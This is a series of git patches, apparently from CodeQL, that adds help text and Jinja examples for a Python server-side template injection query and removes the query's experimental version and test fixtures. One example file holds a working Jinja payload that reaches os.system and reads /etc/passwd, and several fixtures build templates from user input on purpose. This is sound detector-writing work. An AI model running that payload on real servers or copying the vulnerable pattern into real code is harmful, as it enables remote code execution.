02f395f5f845e5c11aed8ff988867bd8e9722060 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Thu, 21 Nov 2024 16:51:28 +0000 Subject: [PATCH 0945/1267] Add qhelp --- .../Security/CWE-074/TemplateInjection.qhelp | 30 +++++++++++++++++++ .../src/Security/CWE-074/examples/JinjaBad.py | 19 ++++++++++++ .../CWE-074/examples/JinjaGoodParam.py | 17 +++++++++++ .../CWE-074/examples/JinjaGoodSandbox.py | 21 +++++++++++++ .../CWE-074/examples/template_exploit.txt | 1 + 5 files changed, 88 insertions(+) create mode 100644 python/ql/src/Security/CWE-074/TemplateInjection.qhelp create mode 100644 python/ql/src/Security/CWE-074/examples/JinjaBad.py create mode 100644 python/ql/src/Security/CWE-074/examples/JinjaGoodParam.py create mode 100644 python/ql/src/Security/CWE-074/examples/JinjaGoodSandbox.py create mode 100644 python/ql/src/Security/CWE-074/examples/template_exploit.txt diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp new file mode 100644 index 00000000000..06990a7237b --- /dev/null +++ b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp @@ -0,0 +1,30 @@ + + + +

    + A template from a server templating engine such as Jinja constructed from user input can allow the user to execute arbitrary code using certain template features. It can also allow for cross-site scripting. +

    + + +

    + Ensure that an untrusted value is not used to directly construct a template. + Jinja also provides a SandboxedEnvironment that prohibits access to unsafe methods and attributes, that can be used if constructing a template from user input is absolutely necessary. +

    +     + +

    In the following case template is used to generate a Jinja2 template string. This can lead to remote code execution.

    + + +

    The following is an example of a string that could be used to cause remote code execution when interpreted as a template:

    + + +

    In the following case, user input is not used to construct the template; rather is only used for as the parameters to render the template, which is safe.

    + + +

    In the following case, a SandboxedEnvironment is used, preventing remote code execution.

    + +     + +
  • Portswigger : [Server Side Template Injection](https://portswigger.net/web-security/server-side-template-injection)
    • +     + diff --git a/python/ql/src/Security/CWE-074/examples/JinjaBad.py b/python/ql/src/Security/CWE-074/examples/JinjaBad.py new file mode 100644 index 00000000000..0a82135b49b --- /dev/null +++ b/python/ql/src/Security/CWE-074/examples/JinjaBad.py @@ -0,0 +1,19 @@ +from django.urls import path +from django.http import HttpResponse +from jinja2 import Template, escape + + +def a(request): + template = request.GET['template'] + + # BAD: Template is constructed from user input. + t = Template(template) + + name = request.GET['name'] + html = t.render(name=escape(name)) + return HttpResponse(html) + + +urlpatterns = [ + path('a', a), +] \ No newline at end of file diff --git a/python/ql/src/Security/CWE-074/examples/JinjaGoodParam.py b/python/ql/src/Security/CWE-074/examples/JinjaGoodParam.py new file mode 100644 index 00000000000..1d8bb6962f6 --- /dev/null +++ b/python/ql/src/Security/CWE-074/examples/JinjaGoodParam.py @@ -0,0 +1,17 @@ +from django.urls import path +from django.http import HttpResponse +from jinja2 import Template, escape + + +def a(request): + # GOOD: Template is a constant, not constructed from user input + t = Template("Hello, {{name}}!") + + name = request.GET['name'] + html = t.render(name=escape(name)) + return HttpResponse(html) + + +urlpatterns = [ + path('a', a), +] \ No newline at end of file diff --git a/python/ql/src/Security/CWE-074/examples/JinjaGoodSandbox.py b/python/ql/src/Security/CWE-074/examples/JinjaGoodSandbox.py new file mode 100644 index 00000000000..488591c6f83 --- /dev/null +++ b/python/ql/src/Security/CWE-074/examples/JinjaGoodSandbox.py @@ -0,0 +1,21 @@ +from django.urls import path +from django.http import HttpResponse +from jinja2 import escape +from jinja2.sandbox import SandboxedEnvironment + + +def a(request): + env = SandboxedEnvironment() + template = request.GET['template'] + + # GOOD: A sandboxed environment is used to construct the template. + t = env.from_string(template) + + name = request.GET['name'] + html = t.render(name=escape(name)) + return HttpResponse(html) + + +urlpatterns = [ + path('a', a), +] \ No newline at end of file diff --git a/python/ql/src/Security/CWE-074/examples/template_exploit.txt b/python/ql/src/Security/CWE-074/examples/template_exploit.txt new file mode 100644 index 00000000000..607b95bd8d8 --- /dev/null +++ b/python/ql/src/Security/CWE-074/examples/template_exploit.txt @@ -0,0 +1 @@ +{% for s in ().__class__.__base__.__subclasses__() %}{% if "warning" in s.__name__ %}{{s()._module.__builtins__['__import__']('os').system('cat /etc/passwd') }}{% endif %}{% endfor %} From e4e02ec6749947b6f2805482d07ea7d13ac86060 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Thu, 21 Nov 2024 16:59:12 +0000 Subject: [PATCH 0946/1267] Add security severity + fix qhelp --- python/ql/src/Security/CWE-074/TemplateInjection.qhelp | 2 +- python/ql/src/Security/CWE-074/TemplateInjection.ql | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp index 06990a7237b..477d1b0e139 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp +++ b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp @@ -12,7 +12,7 @@

    -

    In the following case template is used to generate a Jinja2 template string. This can lead to remote code execution.

    +

    In the following case, template is used to generate a Jinja2 template string. This can lead to remote code execution.

    The following is an example of a string that could be used to cause remote code execution when interpreted as a template:

    diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.ql b/python/ql/src/Security/CWE-074/TemplateInjection.ql index 125478c801c..2ea68414259 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.ql +++ b/python/ql/src/Security/CWE-074/TemplateInjection.ql @@ -4,6 +4,7 @@ * @kind path-problem * @problem.severity error * @precision high + * @security-severity 9.3 * @id py/template-injection * @tags security * external/cwe/cwe-074 From 4602c5c90545c4d4b59464e4ccad51f0bd75a3da Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Thu, 21 Nov 2024 17:06:25 +0000 Subject: [PATCH 0947/1267] Remove experimental version + qhelp fixes --- .../Security/CWE-074/TemplateInjection.qhelp | 4 +- .../experimental/Security/CWE-074/JinjaBad.py | 19 -- .../Security/CWE-074/JinjaGood.py | 20 --- .../CWE-074/TemplateConstructionConcept.qll | 165 ------------------ .../Security/CWE-074/TemplateInjection.qhelp | 24 --- .../Security/CWE-074/TemplateInjection.ql | 20 --- .../TemplateInjectionCustomizations.qll | 59 ------- .../CWE-074/TemplateInjectionQuery.qll | 18 -- .../CWE-074-TemplateInjection/AirspeedSsti.py | 11 -- .../CWE-074-TemplateInjection/BottleSsti.py | 20 --- .../CWE-074-TemplateInjection/Chameleon.py | 10 -- .../CWE-074-TemplateInjection/CheetahSinks.py | 22 --- .../CWE-074-TemplateInjection/ChevronSsti.py | 24 --- .../DjangoTemplates.py | 41 ----- .../FlaskTemplate.py | 22 --- .../CWE-074-TemplateInjection/Genshi.py | 18 -- .../CWE-074-TemplateInjection/JinjaSsti.py | 30 ---- .../CWE-074-TemplateInjection/MakoSsti.py | 15 -- .../CWE-074-TemplateInjection/TRender.py | 12 -- .../TemplateInjection.expected | 107 ------------ .../TemplateInjection.qlref | 1 - 21 files changed, 2 insertions(+), 660 deletions(-) delete mode 100644 python/ql/src/experimental/Security/CWE-074/JinjaBad.py delete mode 100644 python/ql/src/experimental/Security/CWE-074/JinjaGood.py delete mode 100644 python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll delete mode 100644 python/ql/src/experimental/Security/CWE-074/TemplateInjection.qhelp delete mode 100644 python/ql/src/experimental/Security/CWE-074/TemplateInjection.ql delete mode 100644 python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll delete mode 100644 python/ql/src/experimental/Security/CWE-074/TemplateInjectionQuery.qll delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/AirspeedSsti.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/BottleSsti.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Chameleon.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/CheetahSinks.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/ChevronSsti.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/DjangoTemplates.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/FlaskTemplate.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Genshi.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/MakoSsti.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TRender.py delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected delete mode 100644 python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp index 477d1b0e139..619d834d1cf 100644 --- a/python/ql/src/Security/CWE-074/TemplateInjection.qhelp +++ b/python/ql/src/Security/CWE-074/TemplateInjection.qhelp @@ -16,10 +16,10 @@

    The following is an example of a string that could be used to cause remote code execution when interpreted as a template:

    - +

    In the following case, user input is not used to construct the template; rather is only used for as the parameters to render the template, which is safe.

    - +

    In the following case, a SandboxedEnvironment is used, preventing remote code execution.

    diff --git a/python/ql/src/experimental/Security/CWE-074/JinjaBad.py b/python/ql/src/experimental/Security/CWE-074/JinjaBad.py deleted file mode 100644 index aaac3ec819e..00000000000 --- a/python/ql/src/experimental/Security/CWE-074/JinjaBad.py +++ /dev/null @@ -1,19 +0,0 @@ -from django.urls import path -from django.http import HttpResponse -from jinja2 import Template as Jinja2_Template -from jinja2 import Environment, DictLoader, escape - - -def a(request): - # Load the template - template = request.GET['template'] - t = Jinja2_Template(template) - name = request.GET['name'] - # Render the template with the context data - html = t.render(name=escape(name)) - return HttpResponse(html) - - -urlpatterns = [ - path('a', a), -] diff --git a/python/ql/src/experimental/Security/CWE-074/JinjaGood.py b/python/ql/src/experimental/Security/CWE-074/JinjaGood.py deleted file mode 100644 index a1b60561850..00000000000 --- a/python/ql/src/experimental/Security/CWE-074/JinjaGood.py +++ /dev/null @@ -1,20 +0,0 @@ -from django.urls import path -from django.http import HttpResponse -from jinja2 import Template as Jinja2_Template -from jinja2 import Environment, DictLoader, escape - - -def a(request): - # Load the template - template = request.GET['template'] - env = SandboxedEnvironment(undefined=StrictUndefined) - t = env.from_string(template) - name = request.GET['name'] - # Render the template with the context data - html = t.render(name=escape(name)) - return HttpResponse(html) - - -urlpatterns = [ - path('a', a), -] diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll b/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll deleted file mode 100644 index 5144e2ff97b..00000000000 --- a/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll +++ /dev/null @@ -1,165 +0,0 @@ -private import python -private import semmle.python.dataflow.new.DataFlow -private import semmle.python.ApiGraphs - -/** - * A data-flow node that constructs a template. - * - * Extend this class to refine existing API models. If you want to model new APIs, - * extend `TemplateConstruction::Range` instead. - */ -class TemplateConstruction extends DataFlow::Node instanceof TemplateConstruction::Range { - /** Gets the argument that specifies the template source. */ - DataFlow::Node getSourceArg() { result = super.getSourceArg() } -} - -/** Provides a class for modeling new system-command execution APIs. */ -module TemplateConstruction { - /** - * A data-flow node that constructs a template. - * - * Extend this class to model new APIs. If you want to refine existing API models, - * extend `TemplateConstruction` instead. - */ - abstract class Range extends DataFlow::Node { - /** Gets the argument that specifies the template source. */ - abstract DataFlow::Node getSourceArg(); - } -} - -// ----------------------------------------------------------------------------- -/** A call to `airspeed.Template`. */ -class AirspeedTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - AirspeedTemplateConstruction() { - this = API::moduleImport("airspeed").getMember("Template").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `bottle.SimpleTemplate`. */ -class BottleSimpleTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - BottleSimpleTemplateConstruction() { - this = API::moduleImport("bottle").getMember("SimpleTemplate").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `bottle.template`. */ -class BottleTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - BottleTemplateConstruction() { - this = API::moduleImport("bottle").getMember("template").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `chameleon.PageTemplate`. */ -class ChameleonTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - ChameleonTemplateConstruction() { - this = API::moduleImport("chameleon").getMember("PageTemplate").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `Cheetah.Template.Template`. */ -class CheetahTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - CheetahTemplateConstruction() { - this = - API::moduleImport("Cheetah") - .getMember("Template") - .getMember("Template") - .getASubclass*() - .getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `chevron.render`. */ -class ChevronRenderConstruction extends TemplateConstruction::Range, API::CallNode { - ChevronRenderConstruction() { this = API::moduleImport("chevron").getMember("render").getACall() } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `django.template.Template` */ -class DjangoTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - DjangoTemplateConstruction() { - this = API::moduleImport("django").getMember("template").getMember("Template").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -// TODO: support django.template.engines["django"]].from_string -/** A call to `flask.render_template_string`. */ -class FlaskTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - FlaskTemplateConstruction() { - this = API::moduleImport("flask").getMember("render_template_string").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `genshi.template.TextTemplate`. */ -class GenshiTextTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - GenshiTextTemplateConstruction() { - this = API::moduleImport("genshi").getMember("template").getMember("TextTemplate").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `genshi.template.MarkupTemplate` */ -class GenshiMarkupTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - GenshiMarkupTemplateConstruction() { - this = API::moduleImport("genshi").getMember("template").getMember("MarkupTemplate").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -// -/** A call to `jinja2.Template`. */ -class Jinja2TemplateConstruction extends TemplateConstruction::Range, API::CallNode { - Jinja2TemplateConstruction() { - this = API::moduleImport("jinja2").getMember("Template").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `jinja2.from_string`. */ -class Jinja2FromStringConstruction extends TemplateConstruction::Range, API::CallNode { - Jinja2FromStringConstruction() { - this = - API::moduleImport("jinja2") - .getMember("Environment") - .getReturn() - .getMember("from_string") - .getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `mako.template.Template`. */ -class MakoTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - MakoTemplateConstruction() { - this = API::moduleImport("mako").getMember("template").getMember("Template").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `trender.TRender`. */ -class TRenderTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - TRenderTemplateConstruction() { - this = API::moduleImport("trender").getMember("TRender").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateInjection.qhelp b/python/ql/src/experimental/Security/CWE-074/TemplateInjection.qhelp deleted file mode 100644 index b044243fc8e..00000000000 --- a/python/ql/src/experimental/Security/CWE-074/TemplateInjection.qhelp +++ /dev/null @@ -1,24 +0,0 @@ - - - -

    - Template Injection occurs when user input is embedded in a template in an unsafe manner. - When an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side is results in Server Side Template Injection. -

    -     - -

    - To fix this, ensure that an untrusted value is not used as a template. If the application requirements do not alow this, use a sandboxed environment where access to unsafe attributes and methods is prohibited. -

    -     - -

    Consider the example given below, an untrusted HTTP parameter `template` is used to generate a Jinja2 template string. This can lead to remote code execution.

    - - -

    Here we have fixed the problem by using the Jinja sandbox environment for evaluating untrusted code.

    - -     - -
  • Portswigger : [Server Side Template Injection](https://portswigger.net/web-security/server-side-template-injection)
    • -     -     diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateInjection.ql b/python/ql/src/experimental/Security/CWE-074/TemplateInjection.ql deleted file mode 100644 index a10ad09a6ac..00000000000 --- a/python/ql/src/experimental/Security/CWE-074/TemplateInjection.ql +++ /dev/null @@ -1,20 +0,0 @@ -/** - * @name Server Side Template Injection - * @description Using user-controlled data to create a template can cause security issues. - * @kind path-problem - * @problem.severity error - * @precision high - * @id py/template-injection - * @tags security - * experimental - * external/cwe/cwe-074 - */ - -import python -import TemplateInjectionQuery -import TemplateInjectionFlow::PathGraph - -from TemplateInjectionFlow::PathNode source, TemplateInjectionFlow::PathNode sink -where TemplateInjectionFlow::flowPath(source, sink) -select sink.getNode(), source, sink, "This Template depends on $@.", source.getNode(), - "user-provided value" diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll b/python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll deleted file mode 100644 index 13c70fc7d04..00000000000 --- a/python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll +++ /dev/null @@ -1,59 +0,0 @@ -/** - * Provides default sources, sinks and sanitizers for detecting - * "template injection" - * vulnerabilities, as well as extension points for adding your own. - */ - -private import python -private import semmle.python.dataflow.new.DataFlow -private import semmle.python.Concepts as C -private import semmle.python.dataflow.new.RemoteFlowSources -private import semmle.python.dataflow.new.BarrierGuards -private import TemplateConstructionConcept - -/** - * Provides default sources, sinks and sanitizers for detecting - * "template injection" - * vulnerabilities, as well as extension points for adding your own. - */ -module TemplateInjection { - /** - * A data flow source for "template injection" vulnerabilities. - */ - abstract class Source extends DataFlow::Node { } - - /** - * A data flow sink for "template injection" vulnerabilities. - */ - abstract class Sink extends DataFlow::Node { } - - /** - * A sanitizer for "template injection" vulnerabilities. - */ - abstract class Sanitizer extends DataFlow::Node { } - - /** - * DEPRECATED: Use `ActiveThreatModelSource` from Concepts instead! - */ - deprecated class RemoteFlowSourceAsSource = ActiveThreatModelSourceAsSource; - - /** - * An active threat-model source, considered as a flow source. - */ - private class ActiveThreatModelSourceAsSource extends Source, C::ActiveThreatModelSource { } - - /** - * A SQL statement of a SQL construction, considered as a flow sink. - */ - class TemplateConstructionAsSink extends Sink { - TemplateConstructionAsSink() { this = any(TemplateConstruction c).getSourceArg() } - } - - /** - * A comparison with a constant, considered as a sanitizer-guard. - */ - class ConstCompareAsSanitizerGuard extends Sanitizer, ConstCompareBarrier { } - - /** DEPRECATED: Use ConstCompareAsSanitizerGuard instead. */ - deprecated class StringConstCompareAsSanitizerGuard = ConstCompareAsSanitizerGuard; -} diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateInjectionQuery.qll b/python/ql/src/experimental/Security/CWE-074/TemplateInjectionQuery.qll deleted file mode 100644 index 111485e2602..00000000000 --- a/python/ql/src/experimental/Security/CWE-074/TemplateInjectionQuery.qll +++ /dev/null @@ -1,18 +0,0 @@ -/** - * Provides a taint-tracking configuration for detecting "template injection" vulnerabilities. - */ - -private import python -import semmle.python.dataflow.new.DataFlow -import semmle.python.dataflow.new.TaintTracking -import TemplateInjectionCustomizations::TemplateInjection - -module TemplateInjectionConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node node) { node instanceof Source } - - predicate isSink(DataFlow::Node node) { node instanceof Sink } - - predicate isBarrierIn(DataFlow::Node node) { node instanceof Sanitizer } -} - -module TemplateInjectionFlow = TaintTracking::Global; diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/AirspeedSsti.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/AirspeedSsti.py deleted file mode 100644 index 8938d8602f8..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/AirspeedSsti.py +++ /dev/null @@ -1,11 +0,0 @@ -import airspeed -from flask import Flask, request - - -app = Flask(__name__) - - -@route('/other') -def a(): - template = request.args.get('template') - return airspeed.Template(template) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/BottleSsti.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/BottleSsti.py deleted file mode 100644 index b5f8a5feeff..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/BottleSsti.py +++ /dev/null @@ -1,20 +0,0 @@ -from bottle import Bottle, route, request, redirect, response, SimpleTemplate -from bottle import template as temp - - -app = Bottle() - - -@route('/other') -def a(): - template = request.query.template - tpl = SimpleTemplate(template) - tpl.render(name='World') - return tmp - - -@route('/other2') -def b(): - template = request.query.template - temp(template, name='World') - return tmp diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Chameleon.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Chameleon.py deleted file mode 100644 index f58a641a9be..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Chameleon.py +++ /dev/null @@ -1,10 +0,0 @@ -from chameleon import PageTemplate -from django.urls import path -from django.http import HttpResponse - - -def chameleon(request): - template = request.GET['template'] - tmpl = PageTemplate(template) - return HttpResponse(tmpl) - diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/CheetahSinks.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/CheetahSinks.py deleted file mode 100644 index 7f9fed4decf..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/CheetahSinks.py +++ /dev/null @@ -1,22 +0,0 @@ -from flask import Flask, request -from Cheetah.Template import Template - - -app = Flask(__name__) - - -@app.route('/other') -def a(): - template = request.args.get('template') - return Template(template) - - -class Template3(Template): - title = 'Hello World Example!' - contents = 'Hello World!' - - -@app.route('/other2') -def b(): - template = request.args.get('template') - t3 = Template3(template) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/ChevronSsti.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/ChevronSsti.py deleted file mode 100644 index f3b0e57fc8f..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/ChevronSsti.py +++ /dev/null @@ -1,24 +0,0 @@ -from flask import Flask, request -import chevron - - -app = Flask(__name__) - - -@app.route('/other') -def a(): - template = request.args.get('template') - return chevron.render(template, {"key": "value"}) - - -@app.route('/other2') -def b(): - template = request.args.get('template') - args = { - 'template': template, - - 'data': { - 'key': 'value' - } - } - return chevron.render(**args) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/DjangoTemplates.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/DjangoTemplates.py deleted file mode 100644 index 26f48fd9278..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/DjangoTemplates.py +++ /dev/null @@ -1,41 +0,0 @@ -from django.urls import path -from django.http import HttpResponse -from django.template import Template, Context, Engine, engines - - -def dj(request): - # Load the template - template = request.GET['template'] - t = Template(template) - ctx = Context(locals()) - html = t.render(ctx) - return HttpResponse(html) - - -def djEngine(request): - # Load the template - template = request.GET['template'] - - django_engine = engines['django'] - t = django_engine.from_string(template) - ctx = Context(locals()) - html = t.render(ctx) - return HttpResponse(html) - - -def djEngineJinja(request): - # Load the template - template = request.GET['template'] - - django_engine = engines['jinja'] - t = django_engine.from_string(template) - ctx = Context(locals()) - html = t.render(ctx) - return HttpResponse(html) - - -urlpatterns = [ - path('', dj), - path('', djEngine), - path('', djEngineJinja), -] diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/FlaskTemplate.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/FlaskTemplate.py deleted file mode 100644 index b74e3cce715..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/FlaskTemplate.py +++ /dev/null @@ -1,22 +0,0 @@ -from flask import Flask, request - - -app = Flask(__name__) - - -@app.route("/") -def home(): - from flask import render_template_string - if request.args.get('template'): - return render_template_string(request.args.get('template')) - - -@app.route("/a") -def a(): - import flask - return flask.render_template_string(request.args.get('template')) - - - -if __name__ == "__main__": - app.run(debug=True) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Genshi.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Genshi.py deleted file mode 100644 index 7800c50da96..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Genshi.py +++ /dev/null @@ -1,18 +0,0 @@ -from django.urls import path -from django.http import HttpResponse -from genshi.template import TextTemplate,MarkupTemplate - -def genshi1(): - template = request.GET['template'] - tmpl = MarkupTemplate(template) - return HttpResponse(tmpl) - -def genshi2(): - template = request.GET['template'] - tmpl = TextTemplate(template) - return HttpResponse(tmpl) - -urlpatterns = [ - path('', genshi1), - path('', genshi2) -] diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py deleted file mode 100644 index 28225c81cba..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py +++ /dev/null @@ -1,30 +0,0 @@ -from django.urls import path -from django.http import HttpResponse -from jinja2 import Template as Jinja2_Template -from jinja2 import Environment, DictLoader, escape - - -def a(request): - # Load the template - template = request.GET['template'] - t = Jinja2_Template(template) - name = request.GET['name'] - # Render the template with the context data - html = t.render(name=escape(name)) - return HttpResponse(html) - -def b(request): - import jinja2 - # Load the template - template = request.GET['template'] - t = jinja2.from_string(template) - name = request.GET['name'] - # Render the template with the context data - html = t.render(name=escape(name)) - return HttpResponse(html) - - -urlpatterns = [ - path('a', a), - path('b', b) -] diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/MakoSsti.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/MakoSsti.py deleted file mode 100644 index 7f6b25cb26c..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/MakoSsti.py +++ /dev/null @@ -1,15 +0,0 @@ -from django.urls import path -from django.http import HttpResponse -from mako.template import Template - - -def mako(request): - # Load the template - template = request.GET['template'] - mytemplate = Template(template) - return HttpResponse(mytemplate) - - -urlpatterns = [ - path('', mako) -] diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TRender.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TRender.py deleted file mode 100644 index 2514f22b805..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TRender.py +++ /dev/null @@ -1,12 +0,0 @@ -from django.urls import path -from django.http import HttpResponse -from trender import TRender - -def trender(request): - template = request.GET['template'] - compiled = TRender(template) - return HttpResponse(compiled) - -urlpatterns = [ - path('', trender) -] diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected deleted file mode 100644 index 06cf81cc6aa..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected +++ /dev/null @@ -1,107 +0,0 @@ -edges -| AirspeedSsti.py:2:26:2:32 | ControlFlowNode for ImportMember | AirspeedSsti.py:2:26:2:32 | ControlFlowNode for request | provenance | | -| AirspeedSsti.py:2:26:2:32 | ControlFlowNode for request | AirspeedSsti.py:10:16:10:22 | ControlFlowNode for request | provenance | | -| AirspeedSsti.py:10:5:10:12 | ControlFlowNode for template | AirspeedSsti.py:11:30:11:37 | ControlFlowNode for template | provenance | | -| AirspeedSsti.py:10:16:10:22 | ControlFlowNode for request | AirspeedSsti.py:10:16:10:27 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | -| AirspeedSsti.py:10:16:10:27 | ControlFlowNode for Attribute | AirspeedSsti.py:10:16:10:43 | ControlFlowNode for Attribute() | provenance | dict.get | -| AirspeedSsti.py:10:16:10:43 | ControlFlowNode for Attribute() | AirspeedSsti.py:10:5:10:12 | ControlFlowNode for template | provenance | | -| CheetahSinks.py:1:26:1:32 | ControlFlowNode for ImportMember | CheetahSinks.py:1:26:1:32 | ControlFlowNode for request | provenance | | -| CheetahSinks.py:1:26:1:32 | ControlFlowNode for request | CheetahSinks.py:10:16:10:22 | ControlFlowNode for request | provenance | | -| CheetahSinks.py:1:26:1:32 | ControlFlowNode for request | CheetahSinks.py:21:16:21:22 | ControlFlowNode for request | provenance | | -| CheetahSinks.py:10:5:10:12 | ControlFlowNode for template | CheetahSinks.py:11:21:11:28 | ControlFlowNode for template | provenance | | -| CheetahSinks.py:10:16:10:22 | ControlFlowNode for request | CheetahSinks.py:10:16:10:27 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | -| CheetahSinks.py:10:16:10:27 | ControlFlowNode for Attribute | CheetahSinks.py:10:16:10:43 | ControlFlowNode for Attribute() | provenance | dict.get | -| CheetahSinks.py:10:16:10:43 | ControlFlowNode for Attribute() | CheetahSinks.py:10:5:10:12 | ControlFlowNode for template | provenance | | -| CheetahSinks.py:21:5:21:12 | ControlFlowNode for template | CheetahSinks.py:22:20:22:27 | ControlFlowNode for template | provenance | | -| 